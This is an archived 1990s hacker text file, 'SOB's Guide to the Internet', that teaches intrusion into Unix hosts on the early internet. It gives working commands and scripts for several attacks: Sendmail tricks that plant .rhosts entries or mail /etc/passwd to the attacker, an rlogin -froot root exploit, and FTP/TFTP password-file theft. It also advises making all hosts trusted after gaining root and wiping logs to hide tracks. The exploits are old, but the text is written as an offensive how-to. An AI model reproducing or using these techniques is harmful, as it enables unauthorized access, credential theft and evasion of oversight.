💾 Archived View for spam.works › mirrors › textfiles › phreak › sobinet.txt captured on 2023-06-16 at 19:49:32.
-=-=-=-=-=-=-
_________________ __________/\ ________ .__ .___
/ _____/\_____ \\______ )/______ / _____/ __ __|__| __| _/____
\_____ \ / | \| | _// ___/ / \ ___| | \ |/ __ |/ __ \
/ \/ | \ | \\___ \ \ \_\ \ | / / /_/ \ ___/
/_______ /\_______ /______ /____ > \______ /____/|__\____ |\___ >
\/ \/ \/ \/ \/ \/ \/
__ __ .__
_/ |_ ____ _/ |_| |__ ____
\ __\/ _ \ \ __\ | \_/ __ \
| | ( <_> ) | | | Y \ ___/
|__| \____/ |__| |___| /\___ >
\/ \/
.___ __ __
| | _____/ |_ ___________ ____ _____/ |_
| |/ \ __\/ __ \_ __ \/ \_/ __ \ __\
| | | \ | \ ___/| | \/ | \ ___/| |
|___|___| /__| \___ >__| |___| /\___ >__|
\/ \/ \/ \/
By Syncomm [SOB]
"If god wanted the net to be secure he would have given it more Dan Farmers..."
-Syncomm
-()- Introduction... -()-
The Internet is an immense place full of many kinds of sites that people used
to spend whole lives scanning for the dialups to... It is also a foolish place
full of bugs and careless sysadmins. One thing about Internet is certain... it
is a one of the best places to hack!
In this doc I'm not going to give you a STEP BY STEP guide on hacking out
the interesting things you find on the "Information Super-Highway" (tm), due to
the fact that hacking on the Internet can be an extremely entailing process... I
will however take a look at some of the major bugs and allot of maneuvers that
can still be used to attack most places on the net...
-()- A VERY Brief History... -()-
In the beginning the fools at the US Government made a big nationwide
network. This in the end grew so large it split into two networks ARPANET and
MILINET. ARPANET was dedicated to scientific research and Milinet was dedicated
to the communication of military sites... Later thousands of other networks
joined and the internet was born...
-()- The Legacy of RLOGIN -()-
"RLOGIN must have been designed by a hacker..." Crypt Keeper [SOB], P/S
One of the easier ways of getting an account on a remote system is to RLOGIN
into it... if your system is trusted you can get in without a passwd (A
lightbulb goes off in an empty skull somewhere...) The way to get a trusted
account is to have your site listed in a users .rhosts file, or in the
/etc/hosts.equiv in a format like this...
%cat .rhosts
gnu.ai.mit.edu +
%
The "+" designates this as a trusted site and it doesn't require a passwd
when someone from the mentioned system logs into that account from a remote
site.
When you do get on a system I suggest you see what .rhosts files you have
access to with the command...
%find / -name .rhosts -exec /bin/cat {} ";"
That will give you a long list that you may want to edit in the future to
"ensure" your access to the system. A good idea is to add a plus sign to the
/etc/rhosts.equiv file to make ALL hosts trusted, you should do this immediately
after you gain root privileges.
One technique to make an .rhosts file on a remote site involves sendmail.
Example:
%cat evil
# Evil Sendmail Script
telnet site.name.com 25 << EOSM
rcpt to:/home/name/.rhosts
mail from: r3w+
data
(garbage)
.
rcpt to: /home/name/.rhosts
mail from:r3w+
data
yoursite.name.com +
.
quit
EOSM
%/bin/sh evil
Trying 666.666.666.1
Connected to satan.com
Escape character is '^]'.
Connection closed by foreign host.
%rlogin site.name.com -l account name
-*- Welcome to satan.com -*-
satan%
This trick works on all Sendmail previous to 5.59 from Berkeley.
Another trick involving sendmail is to telnet to the site saying the mail is
from "|/bin/echo "yoursite.name +" > /etc/hosts.equiv".
AIX and Linux can sometimes be exploited with a HUGE rlogin hole which has been
patched on most systems. The format is:
%rlogin site.name.com -l -froot
-*- Welcome to site.name.com -*-
site%tprof -x /bin/sh
This will give you root and allow you to edit all files.
You may also want to take a look and make sure the system doesn't have an
unpassworded "RSH" or remote shell... I found a few systems that I was able to
RSH into and snoop around gathering information that helped me hack it in the
future.
-()- FTP and TFTP -()-
File Transfer Protocol has been long abused to get passwd files from hosts...
an old bug that still pops up occasional is "ftp -n".
%ftp -n
ftp> open site.name.com
Connected to site.name.com
220 site.name.com FTP server ready.
ftp> quote user ftp
331 Guest login okay, send ident as password.
ftp> quote cwd ~root
530 Please send login with USER and PASS.
ftp> quote pass ftp
230 Guest login okay, access restrictions apply.
ftp>
If this works you are in as root and can modify all directories and files.
Another FTP trick is to login as "anonymous" or "ftp" then send a file called
.forward to the directory. The .forward file should contain "|/bin/mail
you@yoursite.com < /etc/passwd". Now mail a letter to "ftp" or "anonymous"
and you get the passwd file in your mailbox.
TFTP also has a huge bug on some systems. You almost never see this bug
these days... but you never know!
%tftp site.name.com
tftp> get /etc/passwd
This will get you the actual passwd files on some systems...
-()-X Windows-()-
X Windows is a big risk due to the fact they can be monitored remotely... take
a look at the xwatch.sh file that SHOULD have come with this doc...
-()- Sendmail -()-
Alot of versions before sendmail 5.59 had a bug in which you could specify your
name as a "|" then a command... such as
mail from: "|/bin/mail you@your.site.name < /etc/passwd"
Sendmail can also be helpful for finding users on a system with the 'expn' and
'vrfy' command as follows...
%telnet target.com 25
Connecting to host target.com (666.666.666.1), port 25
connection open
220 target.com Sendmail 5.5/target ready at Sun, 7 July 94 18:00 PDT
expn decode
250 <"|/usr/bin/uudecode">
quit
Finding the mail alias "decode" can provide you with a nice bug... with decode
you can add a site name to nearly any account (depending on who owns the decode
account) Ex.
% echo "your.site.name" | uuencode /home/idiot/.rhosts | mail decode@target.com
-()- NIS -()-
NIS, NFS, and almost every other form of RPC is plagued with bugs... With the
proper tools almost anyone can get a passwd file from a system running NIS. The
popular way is to use YPX (tm) which should have come with this doc. There are
other better tools such as RPCToolKit and NFS (by Leendert) which allow an
easier handling of sites running RPC.
One important thing to note is that the directory /var/yp contains the domain
name of host. So if the director /var/yp is world readable or if /var is
exported then you have the domain name.
Normally, a remote (network) file system is mounted by requesting the
mount demon on the machine on which the file system resides to perform
a mount RPC. The result of this RPC is the file handle of the root of
remote file system. As a security measure the mount demon checks the
source machine of the request against a list of allowable machines
(this list is found in /etc/exports). If the requester's machine is not
in the export list, the mount RPC will of course fail. One could argue
against the fitness of this security approach, but in common day practice
it seems sufficient.
However, a special feature of the portmapper (alias rpcbind)allows you to
circumvent this check. The portmapper provides an indirect(or proxy) RPC
service. This service is very simple, in that respect that you provide the
parameters of the RPC, send them to the portmapper and it will make the RPC call
for you. This feature, as you by now probably have guessed, allows you to
perform indirect RPC mount calls. Since the source of the request (in the mount
demon's point of view) is his local machine such a request is often granted.
This will only work if the local machine is mentioned in the export list for its
own exportable file systems, but with netgroup facilities this is often the
case.
Note that when the mount call succeeds, we have a handle of the remote
file system and there is no stopping us. Using this file handle we
can perform NFS requests by directly addressing the remote NFS server.
There is no need to do this through the portmapper as well since the
NFS server doesn't do any further check if the requester can provide
a good file handle. This gives us the advantage to provide our own Unix
authentication information (something that can't be done using the
portmapper's indirect RPC feature). This way it becomes possible to
set the Unix user id.
Both the portmapper bugs are used in Leendert's program NFS, so may be patched
on some systems.
-()- Evasion -()-
It alwayes has been a good idea to erase your tracks on a remote host... a
simple way to get yourself out of the system logs (ie. the UTMP, WTMP, syslog,
etc.) is to use a program called ZAP, which AGAIN should be included with this
doc. NOTE: You must be root to use this program.
Be on the lookout for updates to this file on the following BBSs:
___ ___
: ___/ /\ /\ \___
___/ / / _\________________________/_ \ \ \___ :
| ___/ / / / /_ \ \ \ \ \___
_|_____/ / / / / // SOB MEMBER BOARDS \ \ \ \ \ \_____|_
/______/__/__/__/__/ /________________________________\ \__\__\__\__\______\
\ \ \ \ \ \ \________________________________/ / / / / / /
\______\__\__\__\__\/ \/__/__/__/__/______/
: :
! Utopia -*SOB WORLD HQ*- (210) PRI-VITE !
| Social Deception -*SOB USHQ*- (606) 261-3442 |
| Arrested Development -*SOB Holland HQ*- +31-77-547477 |
| Lucid Nightmare -*SOB Eastern HQ*- (703) 758-1655 |
| Celestial Woodlands -*SOB Dist. S.*- (409) 764-2843 |
! Purple Hell -*SOB Dist. S.*- (806) 791-0747 !
| Paradise Lost -*SOB Dist. S.*- (414) 476-3181 |
| Cyberspace.net -*SOB I-Net Dist. S.*- /pub/SOB |
:__________________ __________________:
/ / / / / /\________________________________/\ \ \ \ \ \
/______/__/__/__/__/ /________________________________\ \__\__\__\__\______\
\______\ \ \ \ \ \ _ / / / / / /______/
| \__\ \ \ \ \ // / / / /__/ |
: \__\ \ \ \____________________________/ / / /__/ :
\__\ \ / \ / /__/
\__\/ \/__/